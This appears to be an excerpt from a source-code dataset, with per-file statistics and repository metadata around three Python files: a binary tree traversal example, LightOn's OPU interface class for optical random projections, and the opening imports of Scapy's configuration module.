| 0.109589
| 0.021918
| 0.180822
| 0
| 0
| 0
| 0
| 0
| 0
| 0.042471
| 0.414027
| 884
| 32
| 91
| 27.625
| 0.662162
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0
| 0.034483
| 0
| 0.068966
| 0.103448
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e2b817212060ef7c5fee7505c4febd057adc71
| 5,827
|
py
|
Python
|
collection/cp/algorithms-master/python/binary_tree.py
|
daemonslayer/Notebook
|
a9880be9bd86955afd6b8f7352822bc18673eda3
|
[
"Apache-2.0"
] | 1
|
2019-03-24T13:12:01.000Z
|
2019-03-24T13:12:01.000Z
|
collection/cp/algorithms-master/python/binary_tree.py
|
daemonslayer/Notebook
|
a9880be9bd86955afd6b8f7352822bc18673eda3
|
[
"Apache-2.0"
] | null | null | null |
collection/cp/algorithms-master/python/binary_tree.py
|
daemonslayer/Notebook
|
a9880be9bd86955afd6b8f7352822bc18673eda3
|
[
"Apache-2.0"
] | null | null | null |
"""
Binary Tree and basic properties
1. In-Order Traversal
2. Pre-Order Traversal
3. Post-Order Traversal
4. Level-Order Traversal
"""
from collections import deque
class BinaryTree(object):
"""
Representation of a general binary tree
data: value of element
left: Left subtree
right: Right subtree
"""
def __init__(self, data, left=None, right=None):
if data is None:
raise ValueError('data cannot be null')
self.data = data
self.left = left
self.right = right
def insert(self, data):
raise NotImplementedError('Method insert is not Implemented')
def delete(self, data):
raise NotImplementedError('Method delete is not implemented')
def inorder_traversal(self, write=True):
"""
Return list of node data as inorder traversal. If write is True then print as well.
        This is an iterative tree inorder traversal.
Algorithm:
1. Create a stack of nodes node_stack
2. Mark root as current
3. While current is not none or node_stack is not empty
            a. While current is not empty, push current to node_stack and reassign current to current->left
            b. If current is empty and node_stack is not empty, then pop the top of the stack and append its data to traversal_list
            c. Mark current as popped_node->right
"""
traversal_lis = []
node_stack = []
current = self
while current or node_stack:
while current:
node_stack.append(current)
current = current.left
if node_stack:
node = node_stack.pop()
traversal_lis.append(node.data)
current = node.right
if write:
for item in traversal_lis:
print(item, end=' ')
return traversal_lis
def preorder_traversal(self, write=True):
"""
Return list of node data as preorder traversal. If write is true then print as well.
Algorithm:
1. Create stack of nodes as node_stack
2. Mark root as current
3. While current is not none or node_stack is not empty
a. While current is not empty
i. Push current to node_stack
ii. Add current->data to traversal_list
iii. Reassign current to current->left
            b. If node_stack is not empty, then pop the topmost node from node_stack and assign current to
               popped_node->right
"""
traversal_lis = []
node_stack = []
current = self
while current or node_stack:
while current:
node_stack.append(current)
traversal_lis.append(current.data)
current = current.left
if node_stack:
node = node_stack.pop()
current = node.right
if write:
for item in traversal_lis:
print(item, end=' ')
return traversal_lis
def postorder_traversal(self, write=True):
"""
Return list of node data as postorder traversal. If write is true then print as well.
Algorithm:
1. Create stack of nodes as node_stack
2. Mark root as current
3. While current is not None or node_stack is not empty
a. While current is not None
i. Push current to node_stack
ii. Append current->data to traversal_list
                iii. Reassign current as current->right (note: we walk current->right first, which
                     builds a reversed postorder that step 4 reverses)
            b. If node_stack is not empty, then pop the top node and assign popped_node->left to current
        4. Reverse traversal_list to obtain the postorder sequence
        """
traversal_lis = []
node_stack = []
current = self
while current or node_stack:
while current:
node_stack.append(current)
traversal_lis.append(current.data)
current = current.right
if node_stack:
node = node_stack.pop()
current = node.left
        # The loop above yields root -> right -> left; reverse it to get postorder
        traversal_lis.reverse()
        if write:
            for item in traversal_lis:
                print(item, end=' ')
        return traversal_lis
def levelorder_traversal(self, write=True):
"""
Return list of node data as level order traversal. If write is true then print as well.
Algorithm:
1. Maintain a queue of nodes to process as node_queue
2. Push root to node_queue
3. While node_queue is not empty
a. Get top node of node_queue as top
b. Push top->data to traversal_list
c. Append top->left and top->right into node_queue if they are not null
"""
traversal_list = []
node_queue = deque()
node_queue.append(self)
while node_queue:
top = node_queue.popleft()
traversal_list.append(top.data)
if top.left:
node_queue.append(top.left)
if top.right:
node_queue.append(top.right)
if write:
for item in traversal_list:
print(item, end=' ')
return traversal_list
def main():
"""
Tree Structure:
1
/ \
2 3
/ \
4 5
"""
tree = BinaryTree(1)
tree.left = BinaryTree(2)
tree.right = BinaryTree(3)
tree.left.left = BinaryTree(4)
tree.left.right = BinaryTree(5)
assert tree.inorder_traversal(write=False) == [4, 2, 5, 1, 3]
assert tree.preorder_traversal(write=False) == [1, 2, 4, 5, 3]
    assert tree.postorder_traversal(write=False) == [4, 5, 2, 3, 1]
assert tree.levelorder_traversal(write=False) == [1, 2, 3, 4, 5]
if __name__ == '__main__':
main()
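# A recursive inorder for cross-checking the iterative version above
# (a sketch that works on the same BinaryTree nodes).
def inorder_recursive(node):
    if node is None:
        return []
    return (inorder_recursive(node.left)
            + [node.data]
            + inorder_recursive(node.right))

# e.g. inorder_recursive(tree) == tree.inorder_traversal(write=False)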
| 33.488506
| 120
| 0.579372
| 744
| 5,827
| 4.428763
| 0.157258
| 0.073748
| 0.027314
| 0.030956
| 0.557511
| 0.509863
| 0.509863
| 0.472231
| 0.435812
| 0.395448
| 0
| 0.012182
| 0.351982
| 5,827
| 173
| 121
| 33.682081
| 0.860434
| 0.386477
| 0
| 0.505747
| 0
| 0
| 0.030284
| 0
| 0
| 0
| 0
| 0
| 0.045977
| 1
| 0.091954
| false
| 0
| 0.011494
| 0
| 0.16092
| 0.045977
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e3869d32d3fe51b72766bc724a95897a33b8c9
| 32,841
|
py
|
Python
|
lightonml/opu.py
|
lightonai/lightonml
|
451327cccecdca4e8ec65df30f30d3fd8ad2194f
|
[
"Apache-2.0"
] | 27
|
2021-02-24T15:37:20.000Z
|
2022-01-12T00:28:22.000Z
|
lightonml/opu.py
|
lightonai/lightonml
|
451327cccecdca4e8ec65df30f30d3fd8ad2194f
|
[
"Apache-2.0"
] | 4
|
2021-02-26T12:58:21.000Z
|
2021-09-10T09:54:49.000Z
|
lightonml/opu.py
|
lightonai/lightonml
|
451327cccecdca4e8ec65df30f30d3fd8ad2194f
|
[
"Apache-2.0"
] | 9
|
2021-02-26T15:58:32.000Z
|
2021-06-21T09:18:48.000Z
|
# Copyright (c) 2020 LightOn, All Rights Reserved.
# This file is subject to the terms and conditions defined in
# file 'LICENSE.txt', which is part of this source code package.
"""
This module contains the OPU class
"""
import time
from math import sqrt
import pkg_resources
from lightonml.encoding.base import NoEncoding, NoDecoding
import warnings
from typing import Optional, Union, Tuple, TYPE_CHECKING
import numpy as np
from contextlib import ExitStack
import attr
import inspect
import lightonml
from lightonml.internal.config import get_host_option, opu_version
from lightonml.internal import config, output_roi, utils, types
from lightonml.internal.user_input import OpuUserInput, InputTraits
from lightonml.internal.simulated_device import SimulatedOpuDevice
from lightonml.context import ContextArray
from lightonml.internal.settings import OpuSettings, TransformSettings
from lightonml.internal.runner import TransformRunner, FitTransformRunner
from lightonml.internal.types import InputRoiStrategy, IntOrTuple, TransformOutput, AcqState
from lightonml.types import OutputRescaling
# Import lightonopu only for typechecking, as it's an optional module and may not be present
if TYPE_CHECKING:
from lightonopu.internal.device import OpuDevice
# noinspection PyPep8Naming
class OPU:
"""Interface to the OPU.
.. math:: \\mathbf{y} = \\lvert \\mathbf{R} \\mathbf{x} \\rvert^2 \\mbox{ (non-linear transform, the default)}
.. math:: \\mathbf{y} = \\mathbf{R}\\mathbf{x} \\mbox{ (linear transform)}
Main methods are `transform`, `linear_transform`, `fit1d` and `fit2d`,
and accept NumPy arrays or PyTorch tensors.
The non-linear transform (`transform`) is a native operation for the OPU, and performs at a higher
speed than `linear_transform`.
Acquiring/releasing hardware device resources is done by open/close and a
context-manager interface.
Unless `open_at_init=False`, these resources are acquired automatically at init.
If another process or kernel has not released the resources, an error will be
raised, call `close()` or shutdown the kernel on the OPU object to release it.
Parameters
----------
n_components : int,
dimensionality of the target projection space.
opu_device : OpuDevice or SimulatedOpuDevice, optional
optical processing unit instance linked to a physical or simulated device.
If not provided, a device is properly instantiated.
If opu_device is of type SimulatedOpuDevice, the random matrix is generated
at __init__, using max_n_features and n_components
max_n_features: int, optional
maximum number of binary features that the OPU will transform
used only if opu_device is a SimulatedOpuDevice,
in order to initiate the random matrix
config_file : str, optional
path to the configuration file (for dev purpose)
config_override: dict, optional
for override of the config_file (for dev purpose)
verbose_level: int, optional
deprecated, use lightonml.set_verbose_level() instead
.. seealso:: `lightonml.set_verbose_level`
input_roi_strategy: types.InputRoiStrategy, optional
describes how to display the features on the input device
.. seealso:: `lightonml.internal.types.InputRoiStrategy`
open_at_init: bool, optional
forces the setting of acquiring hardware resource at init. If
not provided, follow system's setting (usually True)
disable_pbar: bool, optional
disable display of the progress bar when verbose_level is set to 1
simulated: bool, optional
performs the random projection using CPU, in case no OPU is available on your machine
the random matrix is then generated at __init__, using max_n_features and n_components
rescale: types.OutputRescaling, optional,
output rescaling method for `linear_transform`.
Ignored by `transform`.
.. seealso:: `lightonml.types.OutputRescaling`
Attributes
----------
n_components: int
dimensionality of the target projection space.
rescale: types.OutputRescaling,
output rescaling method for `linear_transform`.
Ignored by `transform`.
max_n_features: int
maximum number of binary features that the OPU will transform
writeable only if opu_device is a SimulatedOpuDevice,
in order to initiate or resize the random matrix
device: OpuDevice or SimulatedOpuDevice
underlying hardware that performs transformation (read-only)
input_roi_strategy: types.InputRoiStrategy, optional
describes how to display the features on the input device
"""
def __init__(self, n_components: int = 200000,
opu_device: Optional[Union["OpuDevice", SimulatedOpuDevice]] = None,
max_n_features: int = 1000, config_file: str = "",
config_override: dict = None, verbose_level: int = -1,
input_roi_strategy: types.InputRoiStrategy = types.InputRoiStrategy.full,
open_at_init: bool = None, disable_pbar=False, simulated=False,
rescale: Union[OutputRescaling, str] = OutputRescaling.variance):
self.__opu_config = None
self.__config_file = config_file
self.__config_override = config_override
self._max_n_features = max_n_features
self.disable_pbar = disable_pbar
self.rescale = rescale
# Get trace and print functions
if verbose_level != -1:
            warnings.warn("Verbose level arg will be removed in 1.3, "
"Use lightonml.set_verbose_level instead",
DeprecationWarning)
lightonml.set_verbose_level(verbose_level)
else:
verbose_level = lightonml.get_verbose_level()
self._debug = lightonml.get_debug_fn()
self._trace = lightonml.get_trace_fn()
self._print = lightonml.get_print_fn()
        no_config_msg = "No configuration files for the OPU were found on this machine.\n" \
"You may want to run the OPU in a simulated manner, by passing the " \
"simulated argument to True at init.\n" \
"See https://docs.lighton.ai/notes/get_started.html#Simulating-an-OPU " \
"for more details.\n" \
"See also https://lighton.ai/products for getting access to our technology."
if simulated and opu_device is not None:
raise ValueError("simulated and opu_device arguments are conflicting")
# Device init, or take the one passed as input
if opu_device:
if type(opu_device).__name__ not in ["SimulatedOpuDevice", "OpuDevice"]:
raise TypeError("opu_device must be of type SimulatedOpuDevice or OpuDevice")
self.device = opu_device
elif simulated:
self.device = SimulatedOpuDevice()
else:
# Instantiate device directly
from lightonopu.internal.device import OpuDevice
if not self.__config_file and not config.host_has_opu_config():
# Looks like there's no OPU on this host as we didn't find configuration files
raise RuntimeError(no_config_msg)
opu_type = self.config["type"]
frametime_us = self.config["input"]["frametime_us"]
exposure_us = self.config["output"]["exposure_us"]
seq_nb_prelim = self.config.get("sequence_nb_prelim", 0)
name = self.config["name"]
self.device = OpuDevice(opu_type, frametime_us, exposure_us, seq_nb_prelim,
None, verbose_level, name)
self._base_frametime_us = self.device.frametime_us
self._base_exposure_us = self.device.exposure_us
if self._s.simulated:
# build the random matrix if not done already
self._resize_rnd_matrix(max_n_features, n_components)
else:
# Make sure lightonopu is at 1.4.1 or later, needed for linear_reconstruction
pkg_resources.require("lightonopu>=1.4.1")
# initialize linear_reconstruction library
from lightonopu import linear_reconstruction
linear_reconstruction.init(np.prod(self.device.input_shape))
self._output_roi = output_roi.OutputRoi(self.device.output_shape_max,
self.device.output_roi_strategy,
self._s.allowed_roi, self._s.min_n_components)
# This also sets the output ROI
self.n_components = n_components
self.input_roi_strategy = input_roi_strategy
# Runner initialized when entering fit
self._runner = None # type: Optional[TransformRunner]
# ExitStack for device acquisition, initialized when entering fit
self._acq_stack = ExitStack()
self._trace("OPU initialized")
# Open at init, unless relevant host.json option is False
if open_at_init is None:
open_at_init = get_host_option("lightonml_open_at_init", True)
if open_at_init:
self.open()
def _tr_settings(self, no_input=False, **override) -> TransformSettings:
"""Returns transform settings for feeding to TransformRunner"""
init = TransformSettings(self.input_roi_strategy, self.n_components)
settings = attr.evolve(init, **override)
if no_input and self.input_roi_strategy is InputRoiStrategy.auto:
# If no input_roi, replace auto by full strategy
settings.input_roi_strategy = InputRoiStrategy.full
assert settings.input_roi is None
return settings
def fit1d(self, X=None, n_features: int = None,
packed: bool = False, online=False, **override):
"""
Configure OPU transform for 1d vectors
The function can be either called with input vector, for fitting OPU
parameters to it, or just vector dimensions, with ``n_features``.
When input is bit-packed the packed flag must be set to True.
When input vectors must be transformed one by one, performance will
be improved with the online flag set to True.
Parameters
----------
X: np.ndarray or torch.Tensor
Fit will be made on this vector to optimize transform parameters
n_features: int
Number of features for the input, necessary if X parameter isn't provided
packed: bool
Set to true if the input vectors will be already bit-packed
online: bool, optional
Set to true if the transforms will be made one vector after the other
defaults to False
override: dict, optional
keyword args for overriding transform settings (advanced parameters)
"""
return self.__fit(X, n_features, packed, online, False, **override)
def fit2d(self, X=None, n_features: Tuple[int, int] = None,
packed: bool = False, online=False, **override):
"""
Configure OPU transform for 2d vectors
The function can be either called with input vector, for fitting OPU
parameters to it, or just vector dimensions, with `n_features`.
When input is bit-packed the packed flag must be set to True.
Number of features must be then provided with `n_features`
When input vectors must be transformed one by one, performance will
be improved with the online flag set to True.
Parameters
----------
X: np.ndarray or torch.Tensor
a 2d input vector, or batch of 2d input_vectors, binary encoded, packed or not
n_features: tuple(int)
Number of features for the input, necessary if X parameter isn't provided, or
if input is bit-packed
packed: bool, optional
whether the input data is in bit-packed representation
if True, each input vector is assumed to be a 1d array, and the "real" number
of features must be provided as n_features
defaults to False
online: bool, optional
Set to true if the transforms will be made one vector after the other
defaults to False
override: dict, optional
keyword args for overriding transform settings (advanced parameters)
"""
return self.__fit(X, n_features, packed, online, True, **override)
def transform(self, X, encoder_cls=NoEncoding, decoder_cls=NoDecoding) -> TransformOutput:
"""
Performs the nonlinear random projections of one or several input vectors.
The `fit1d` or `fit2d` method must be called before, for setting vector dimensions
or online option.
If you need to transform one vector after each other, add `online=True` in the fit function.
Parameters
----------
X: np.ndarray or torch.Tensor
input vector, or batch of input vectors.
Each vector must have the same dimensions as the one given in `fit1d` or `fit2d`.
encoder_cls: encoder.base.BaseTransformer, optional
class or instance of class that transform the input into binary vectors to be processed by the opu.
decoder_cls: encoder.base.BaseTransformer, optional
class or instance of class that transforms the output of the opu back into the appropriate format.
Returns
-------
Y: np.ndarray or torch.Tensor
complete array of nonlinear random projections of X,
of size self.n_components
If input is an ndarray, type is actually ContextArray,
with a context attribute to add metadata
"""
assert self._runner, "Call fit1d or fit2d before transform"
assert self.device.active, "OPU device isn't active, use opu.open() or \"with opu:\""
if inspect.isclass(encoder_cls):
encoder = encoder_cls()
else:
encoder = encoder_cls
X_enc = encoder.transform(X)
user_input = OpuUserInput.from_traits(X_enc, self._runner.traits)
self._debug(str(user_input))
if user_input.is_batch and not self._s.simulated:
# With batch input start acquisition first
assert self.device.acq_state.value != AcqState.online.value, \
"Can't transform a batch of vectors when acquisition is" \
" in online mode, only single vectors"
with self.device.acquiring(n_images=self._s.n_samples_by_pass):
out = self._runner.transform(user_input)
else:
out = self._runner.transform(user_input)
return self._post_transform(out, user_input, encoder, decoder_cls)
def linear_transform(self, X, encoder_cls=NoEncoding, decoder_cls=NoDecoding) -> TransformOutput:
"""
Do a linear transform of X, for Nitro (non-linear) photonic cores.
Parameters
----------
X: np.ndarray or torch.Tensor
input vector, or batch of input vectors.
Each vector must have the same dimensions as the one given in `fit1d` or `fit2d`.
encoder_cls: encoding.base.BaseTransformer, optional
class or instance of class that transform the input into binary vectors to be processed by the opu.
decoder_cls: encoding.base.BaseTransformer, optional
class or instance of class that transforms the output of the opu back into the appropriate format.
Returns
-------
Y: np.ndarray or torch.Tensor
complete array of nonlinear random projections of X,
of size self.n_components
If input is an ndarray, type is actually ContextArray,
with a context attribute to add metadata
"""
assert self._runner, "Call fit1d or fit2d before linear_transform"
traits = self._runner.traits
if traits.packed:
# TODO implement for packed
raise RuntimeError("Linear transform isn't yet implemented for packed input :/")
if inspect.isclass(encoder_cls):
encoder = encoder_cls()
else:
encoder = encoder_cls
X_enc = encoder.transform(X)
user_input = OpuUserInput.from_traits(X_enc, traits)
_, result_ctx = self._raw_linear_transform(X_enc, traits, user_input)
# Decoding, add context, and optional convert back to torch if needed
output = self._post_transform(result_ctx, user_input, encoder, decoder_cls)
# Rescale the output, intentionally after the decoding step
if self.rescale is OutputRescaling.variance:
n_features = user_input.n_features_s
output = output / (self._s.stdev * sqrt(n_features))
elif self.rescale is OutputRescaling.norm:
output = output / (self._s.stdev * sqrt(self.n_components))
return output
def transform1d(self, *args, **kwargs):
raise RuntimeError("transform1d is deprecated, you must now use fit1d and transform")
def transform2d(self, *args, **kwargs):
raise RuntimeError("transform2d is deprecated, you must now use fit2d and transform")
def fit_transform1d(self, X, packed: bool = False,
**override) -> ContextArray:
"""Performs the nonlinear random projections of 1d input vector(s).
This function is the one-liner equivalent of `fit1d` and `transform` calls.
.. warning:: when making several transform calls, prefer calling `fit1d`
and then `transform`, or you might encounter an inconsistency in the
transformation matrix.
The input data can be bit-packed, where ``n_features = 8*X.shape[-1]``
Otherwise ``n_features = X.shape[-1]``
If tqdm module is available, it is used for progress display
Parameters
----------
X: np.ndarray or torch.Tensor
a 1d input vector, or batch of 1d input_vectors, binary encoded, packed or not
batch can be 1d or 2d. In all cases ``output.shape[:-1] = X.shape[:-1]``
packed: bool, optional
whether the input data is in bit-packed representation
defaults to False
override: keyword args for overriding transform settings (advanced parameters)
Returns
-------
Y: np.ndarray or torch.Tensor
complete array of nonlinear random projections of X,
of size self.n_components
If input is an ndarray, type is actually ContextArray,
with a context attribute to add metadata
"""
self.fit1d(X, None, packed, False, **override)
return self.transform(X)
def fit_transform2d(self, X, packed: bool = False, n_2d_features=None,
**override) -> ContextArray:
"""Performs the nonlinear random projections of 2d input vector(s).
This function is the one-liner equivalent of `fit2d` and `transform` calls.
.. warning:: when making several transform calls, prefer calling `fit2d`
and then `transform`, or you might encounter an inconsistency in the
transformation matrix.
If tqdm module is available, it is used for progress display
Parameters
----------
X: np.ndarray or torch.Tensor
a 2d input vector, or batch of 2d input_vectors, binary encoded, packed or not
packed: bool, optional
whether the input data is in bit-packed representation
if True, each input vector is assumed to be a 1d array, and the "real" number
of features must be provided as n_2d_features
defaults to False
n_2d_features: list, tuple or np.ndarray of length 2
If the input is bit-packed, specifies the shape of each input vector.
Not needed if the input isn't bit-packed.
override: keyword args for overriding transform settings (advanced parameters)
Returns
-------
Y: np.ndarray or torch.Tensor
complete array of nonlinear random projections of X,
of size self.n_components
If input is an ndarray, type is actually ContextArray,
with a context attribute to add metadata
"""
self.fit2d(X, n_2d_features, packed, False, **override)
return self.transform(X)
def __fit(self, X, n_features: IntOrTuple,
packed: bool, online: bool, is_2d_features: bool,
**override):
"""Internal working of the fitXd calls
        Instantiates a TransformRunner, and starts online acquisition if need be.
"""
if X is not None:
# Input is provided, do the fit with user input
user_input = OpuUserInput.from_input(X, packed, is_2d_features, n_features)
tr_settings = self._tr_settings(no_input=False, **override)
self._runner = FitTransformRunner(self._s, tr_settings, user_input,
device=self.device,
disable_pbar=self.disable_pbar)
else:
# Only dimensions are provided, no fitting happens on input
assert n_features, "either input vector or n_features must be specified"
# tr_settings has no input_roi, since it uses X to compute it
tr_settings = self._tr_settings(no_input=True, **override)
traits = InputTraits(n_features, packed)
self._runner = TransformRunner(self._s, tr_settings, traits,
device=self.device,
disable_pbar=self.disable_pbar)
self._acq_stack.close()
if online:
if self._s.no_single_transform:
raise RuntimeError("Online transform isn't available with this OPU")
# Start acquisition only if online. Batch transform start their own.
self._acq_stack.enter_context(self.device.acquiring(online=True))
@staticmethod
def _post_transform(output, user_input, encoder, decoder_cls):
"""Final steps after transform
1. reshape
2. decode the output
3. convert to tensor if user input was tensor
"""
output = user_input.reshape_output(output)
# If encoder has get_params method, it's for transmitting it to decoder init
if inspect.isclass(decoder_cls):
if hasattr(encoder, "get_params"):
decoder = decoder_cls(**encoder.get_params())
else:
decoder = decoder_cls()
else:
decoder = decoder_cls
output = decoder.transform(output)
if user_input.is_tensor:
# noinspection PyPackageRequirements,PyUnresolvedReferences
import torch
return torch.from_numpy(output)
else:
return output
def _raw_linear_transform(self, X, traits=None, user_input=None):
"""
Do linear_transform of X, and return both raw OPU output and decoded output in a tuple
"""
if traits is None:
assert self._runner, "Call fit1d or fit2d before linear_transform"
traits = self._runner.traits
if user_input is None:
user_input = OpuUserInput.from_traits(X, traits)
if self._s.simulated:
prepared_X = X
else:
assert self.device.acq_state.value != AcqState.online.value, \
"Can't do linear transform when acquisition is" \
" in online mode, only single vectors"
assert self._runner.t.input_roi_strategy == InputRoiStrategy.full, \
"ROI strategy must be full for linear_transform to be correct.\n" \
"Set input_roi_strategy attribute to InputRoiStrategy.full."
# X2 is now numpy 2D, whatever the initial shape and the type (torch or numpy)
X2 = user_input.reshape_input(raveled_features=True, leave_single_dim=True)
try:
import lightonopu.linear_reconstruction as reconstruction
except ImportError:
raise RuntimeError("Need a lightonopu version with linear_reconstruction module")
start = time.time()
prepared_X = reconstruction.encode_batch(X2)
self._trace(f"Encoding time {time.time() - start} s")
# Restore the dimension after batch encoding to something suitable for formatting
prepared_X = user_input.unravel_features(prepared_X)
# Run the OPU transform
prepared_input = OpuUserInput.from_traits(prepared_X, traits)
start = time.time()
with self.device.acquiring(n_images=self._s.n_samples_by_pass):
rp_opu = self._runner.transform(prepared_input, linear=True)
self._trace(f"Transform time {time.time() - start} s")
if self._s.simulated:
result_ctx = rp_opu
else:
# Decoding forgets about the context, re-add it to result afterwards
start = time.time()
result = reconstruction.decode_batch(rp_opu)
self._trace(f"Decoding time {time.time() - start} s")
result_ctx = ContextArray(result, rp_opu.context)
return rp_opu, result_ctx
def __enter__(self):
"""Context manager interface that acquires hardware resources
used by the OPU device."""
self.__active_before_enter = self.device.active
self.open()
return self
def __exit__(self, *args):
# Don't close if OPU was already active
if not self.__active_before_enter:
self.close()
def open(self):
"""Acquires hardware resources used by the OPU device
.. seealso:: `close()` or use the context manager interface for
            closing at the end of an indent block
"""
if self.device.active:
return
self.device.open()
# initial reservation for giving batch transforms a buffer ready to use
self.device.reserve(self._s.n_samples_by_pass)
if self._s.detect_trigger:
# Detect trigger issue, and take action if needed
issue = utils.detect_trigger_issue(self.device)
if issue:
# noinspection PyProtectedMember,PyUnresolvedReferences
self.device._OpuDevice__opu.nb_prelim = 1
self._debug("trigger issue detected, workaround applied")
else:
self._debug("trigger issue not detected")
self._debug("OPU opened")
def close(self):
"""Releases hardware resources used by the OPU device"""
self._acq_stack.close()
self.device.close()
self._debug("OPU closed")
@property
def config(self):
"""Returns the internal configuration object"""
# Load it when asked first time
if not self.__opu_config:
self.__opu_config = config.load_config(self.__config_file, self._trace)
if self.__config_override is not None:
utils.recurse_update(self.__opu_config, self.__config_override)
return self.__opu_config
@property
def rescale(self):
return self._rescale
@rescale.setter
def rescale(self, value):
# If str it's the enum value
if isinstance(value, str):
self._rescale = OutputRescaling[value.lower()]
else:
assert isinstance(value, OutputRescaling)
self._rescale = value
@property
def max_n_components(self):
return self._output_roi.max_components
@property
def n_components(self) -> int:
return self._n_components
@n_components.setter
def n_components(self, value: int):
if self._s.simulated:
self._resize_rnd_matrix(self.max_n_features, value)
else:
self.device.output_roi = self._output_roi.compute_roi(value)
# We used to call device.reserve here, but moved to device.acquiring()
self._n_components = value
@property
def max_n_features(self) -> int:
return self._s.max_n_features
@max_n_features.setter
def max_n_features(self, value: int):
if not self._s.simulated:
            raise AttributeError("max_n_features can't be set if device is real")
self._resize_rnd_matrix(value, self._n_components)
self._max_n_features = value
@property
def _s(self) -> OpuSettings:
"""Returns immutable settings associated with the OPU
Settings are immutable (attrs frozen), so generate it at
each call. Performance impact is negligible"""
# Get default value
pass_default = attr.fields(OpuSettings).n_samples_by_pass.default
# Common settings to both simulated and base
kwargs = {"input_shape": self.device.input_shape,
"output_max_shape": self.device.output_shape_max,
"frametime_us": self._base_frametime_us,
"exposure_us": self._base_exposure_us}
if isinstance(self.device, SimulatedOpuDevice):
# Notice we never query self.config here, in order not to
# need a configuration file for simulated device
return OpuSettings(max_n_features=self._max_n_features,
n_samples_by_pass=pass_default,
simulated=True, **kwargs
)
return OpuSettings(
max_n_features=int(np.prod(self.device.input_shape)),
# Will use defaults of OpuSettings if not found
n_samples_by_pass=self.config.get("n_samples_by_pass", pass_default),
min_batch_size=self.config["input"].get("minimum_batch_size", 0),
allowed_roi=self.config["output"].get("allowed_roi"),
# min_n_components is linked to the minimum output size
min_n_components=self.config["output"].get("minimum_output_size", 0),
ones_range=self.config["ones_range"],
n_tries=self.config.get("n_transform_tries", 5),
detect_trigger=self.config.get("detect_trigger_issue", False),
no_single_transform=self.config.get("no_single_transform", False),
stdev=self.config["output"].get("stdev", 1.),
**kwargs)
def _resize_rnd_matrix(self, n_features: int, n_components: int):
"""Resize device's random matrix"""
assert isinstance(self.device, SimulatedOpuDevice)
rnd_mat = self.device.random_matrix
if rnd_mat is None or rnd_mat.shape != (n_features, n_components):
self._print("OPU: computing the random matrix... ", end='', flush=True)
self.device.build_random_matrix(n_features, n_components)
self._print("OK")
def version(self, devices=False):
"""Returns a multi-line string containing name and versions of the OPU"""
version = []
# Build OPU name
if not self._s.simulated:
version.append(opu_version(self.__opu_config))
# module version
version.append(f"lightonml version {lightonml.__version__}")
try:
# noinspection PyUnresolvedReferences
import lightonopu
version.append(f"lightonopu version {lightonopu.__version__}")
except ImportError:
pass
if devices:
version.append(self.device.versions())
return '\n'.join(version)
def __getstate__(self):
state = self.__dict__.copy()
# Remove logging functions, they can't be pickled
state.pop("_debug")
state.pop("_trace")
state.pop("_print")
# acq stack can't be pickled, will be restored
state.pop("_acq_stack")
# If acquisition is ongoing, close it
if not self._s.simulated:
state["__online_acq"] = self.device.acq_state.value == AcqState.online.value
self._acq_stack.close()
# Device itself is closed on pickling
return state
def __setstate__(self, state):
self.__dict__.update(state)
# Restore logging functions removed at getstate
self._debug = lightonml.get_debug_fn()
self._trace = lightonml.get_trace_fn()
self._print = lightonml.get_print_fn()
self._acq_stack = ExitStack()
# Restore online acquisition if it was the case
if state.get("__online_acq", False):
self._acq_stack.enter_context(self.device.acquiring(online=True))
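# A minimal end-to-end sketch with a simulated OPU (no hardware or
# configuration file needed); the sizes below are illustrative only.
if __name__ == "__main__":
    demo_X = np.random.randint(0, 2, size=(10, 512), dtype=np.uint8)  # binary input
    with OPU(n_components=1000, max_n_features=512, simulated=True) as opu:
        opu.fit1d(demo_X)
        projected = opu.transform(demo_X)  # nonlinear random projection, (10, 1000)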
| 44.319838
| 114
| 0.645595
| 4,068
| 32,841
| 5.048673
| 0.146264
| 0.017528
| 0.009933
| 0.00779
| 0.384069
| 0.334989
| 0.304996
| 0.300224
| 0.282063
| 0.262392
| 0
| 0.004078
| 0.283152
| 32,841
| 740
| 115
| 44.37973
| 0.86832
| 0.392832
| 0
| 0.23796
| 0
| 0
| 0.114696
| 0.007588
| 0
| 0
| 0
| 0.001351
| 0.031161
| 1
| 0.084986
| false
| 0.022663
| 0.07932
| 0.011331
| 0.226629
| 0.014164
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e5a12f0690f68a0f2da693b51965dfe681eeea
| 22,938
|
py
|
Python
|
scripts/external_libs/scapy-2.4.3/scapy/config.py
|
timgates42/trex-core
|
efe94752fcb2d0734c83d4877afe92a3dbf8eccd
|
[
"Apache-2.0"
] | 956
|
2015-06-24T15:04:55.000Z
|
2022-03-30T06:25:04.000Z
|
scripts/external_libs/scapy-2.4.3/scapy/config.py
|
angelyouyou/trex-core
|
fddf78584cae285d9298ef23f9f5c8725e16911e
|
[
"Apache-2.0"
] | 782
|
2015-09-20T15:19:00.000Z
|
2022-03-31T23:52:05.000Z
|
scripts/external_libs/scapy-2.4.3/scapy/config.py
|
angelyouyou/trex-core
|
fddf78584cae285d9298ef23f9f5c8725e16911e
|
[
"Apache-2.0"
] | 429
|
2015-06-27T19:34:21.000Z
|
2022-03-23T11:02:51.000Z
|
# This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Philippe Biondi <phil@secdev.org>
# This program is published under a GPLv2 license
"""
Implementation of the configuration object.
"""
from __future__ import absolute_import
from __future__ import print_function
import functools
import os
import re
import time
import socket
import sys
from scapy import VERSION, base_classes
from scapy.consts import DARWIN, WINDOWS, LINUX, BSD, SOLARIS
